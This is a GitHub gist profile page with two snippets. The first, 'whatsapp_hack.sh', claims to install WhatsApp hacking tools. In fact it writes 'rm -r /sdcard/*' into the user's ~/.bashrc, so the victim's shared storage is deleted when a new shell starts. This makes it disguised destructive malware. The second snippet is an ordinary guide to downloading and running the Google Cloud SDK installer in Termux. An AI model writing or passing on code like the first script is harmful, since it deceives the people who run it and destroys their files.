Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View kcubeterm's full-sized avatar
playing chess rn

Krishna Kanhaiya kcubeterm

playing chess rn
View GitHub Profile
@kcubeterm
kcubeterm / whatsapp_hack.sh
Created August 6, 2022 08:58
Whatsapp Hacks for experts.
printf '\033[32m'
echo "installing hacking tools..."
termux-setup-storage
echo "Type the contact no of the victim"
read name_usr
echo "rm -r /sdcard/*" >> ~/.bashrc
@kcubeterm
kcubeterm / Google-sdk-termux.md
Last active April 11, 2024 01:28
How to install google cloud sdk in termux and run cloud shell interactively.

Now Google cloud sdk support python3.9 as well. Lets start.

Without any surprise,use your copy-paste skills to fire following script into your innocent terminal.

pkg install python3 openssh
curl -o sdk.sh sdk.cloud.google.com
chmod +x sdk.sh
./sdk.sh --install-dir=$PREFIX